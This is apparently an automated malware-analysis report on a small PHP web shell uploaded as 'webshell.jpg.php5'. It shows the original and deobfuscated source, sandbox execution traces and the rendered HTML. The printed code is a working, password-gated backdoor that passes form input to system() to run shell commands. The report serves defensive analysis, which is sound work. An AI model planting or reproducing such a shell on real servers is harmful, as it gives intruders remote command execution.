webshell.jpg.php5, webshell.php

md5: 587b9b91c457cda9890a31cc31ac93c5

Jump to:

Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)

Screenshot
Attributes
Execution
system (Deobfuscated, Original)

Input
_POST (Deobfuscated, Original)

Title
 [ d1sx ]  (Deobfuscated, HTML, Original)

URLs
https://i.im.ge/2022/06/10/rzuzlc.jpg (Deobfuscated, HTML, Original)

Deobfuscated PHP code
<html>
    <head>
        <title> [ d1sx ] </title>
    </head>
    <body bgcolor="black">
        <center>
            <p style="color:#008000">
<?php 
if ($_COOKIE['password'] == "haxor1337") {
    echo "shell:<form method=\"POST\"><input type=\"text\" name=\"cmd\" /><input type=\"submit\" /></form><p style=\"color:#008000\">";
    echo system($_POST['cmd']);
    echo "</p>";
} else {
    echo "password<form method=\"POST\"><input type=\"password\" name=\"pasw\" /><input type=\"submit\" /></form>";
    echo "<img src=\"https://i.im.ge/2022/06/10/rzuzlc.jpg\" alt=\"rzuzlc.jpg\" border=\"0\">";
}
if ($_POST['pasw'] == "haxor1337") {
    $value = "haxor1337";
    setcookie("password", $value);
}
?>
            </p>
        </center>
    </body>
</html>

/* 
# --{*********}-- #
# author: d1sx    #
# date x/x/2022   #
# --{*********}-- #
*/
Execution traces
data/traces/587b9b91c457cda9890a31cc31ac93c5_trace-1676244847.1004.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:34:32.998256]
1	0	1	0.000146	393528
1	3	0	0.000208	396592	{main}	1		/var/www/html/uploads/webshell.php	0	0
1	3	1	0.000257	396592
			0.000285	314240
TRACE END   [2023-02-12 21:34:32.998426]

data/traces/587b9b91c457cda9890a31cc31ac93c5_trace-1676250477.8765.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:08:23.774311]
1	0	1	0.000136	393576
1	3	0	0.000205	396640	{main}	1		/var/www/html/uploads/webshell.jpg.php5	0	0
1	3	1	0.000245	396640
			0.000270	314264
TRACE END   [2023-02-12 23:08:23.774472]

Generated HTML code
<html><head>
        <title> [ d1sx ] </title>
    </head>
    <body bgcolor="black">
        <center>
            <p style="color:#008000">
password</p><form method="POST"><input type="password" name="pasw"><input type="submit"></form><img src="https://i.im.ge/2022/06/10/rzuzlc.jpg" alt="rzuzlc.jpg" border="0">            <p></p>
        </center>
    


/* 
# --{*********}-- #
# author: d1sx    #
# date x/x/2022   #
# --{*********}-- #
*/
</body></html>
Original PHP code
<html>
    <head>
        <title> [ d1sx ] </title>
    </head>
    <body bgcolor="black">
        <center>
            <p style="color:#008000">
<?php
    if($_COOKIE['password'] == "haxor1337"){
        echo "shell:<form method=\"POST\"><input type=\"text\" name=\"cmd\" /><input type=\"submit\" /></form><p style=\"color:#008000\">";
        echo system($_POST['cmd']);
        echo "</p>";
    }else{
        echo "password<form method=\"POST\"><input type=\"password\" name=\"pasw\" /><input type=\"submit\" /></form>";
        echo "<img src=\"https://i.im.ge/2022/06/10/rzuzlc.jpg\" alt=\"rzuzlc.jpg\" border=\"0\">";
    }
    
    if($_POST['pasw'] == "haxor1337"){
        $value = "haxor1337";
        setcookie("password", $value);
    }
?>
            </p>
        </center>
    </body>
</html>

/* 
# --{*********}-- #
# author: d1sx    #
# date x/x/2022   #
# --{*********}-- #
*/

PHP Malware Analysis

webshell.jpg.php5, webshell.php

md5: 587b9b91c457cda9890a31cc31ac93c5

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code